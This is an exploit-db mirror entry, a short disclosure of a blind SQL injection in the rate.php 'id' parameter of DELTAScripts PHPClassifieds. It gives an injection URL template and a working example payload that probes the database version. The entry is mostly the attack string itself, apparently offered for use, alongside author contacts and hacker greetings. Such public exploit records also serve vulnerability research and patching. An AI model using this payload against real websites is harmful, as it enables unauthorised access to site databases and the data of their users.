exploit-db-mirror/platforms/php/webapps/11071.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

21 lines
424 B
Text
Executable file

/*
Name : DELTAScripts PHPClassifieds
Vuln : Blind SQL Injection
Author : Hamza 'MizoZ' N.
Email : mizozx[at]gmail[dot]com
WebSite : www.greymen.org<http://www.greymen.org>
Greetz : Zuka, all friends & arab hackers
*/
Vulnerability is in the rate.php , $_GET['id']
[HOST]/[PATH]/rate.php?id=[true value]+[INJECTION]
exemples :
http://server/rate.php?id=405+and+%28select%20version%28%29%29=5--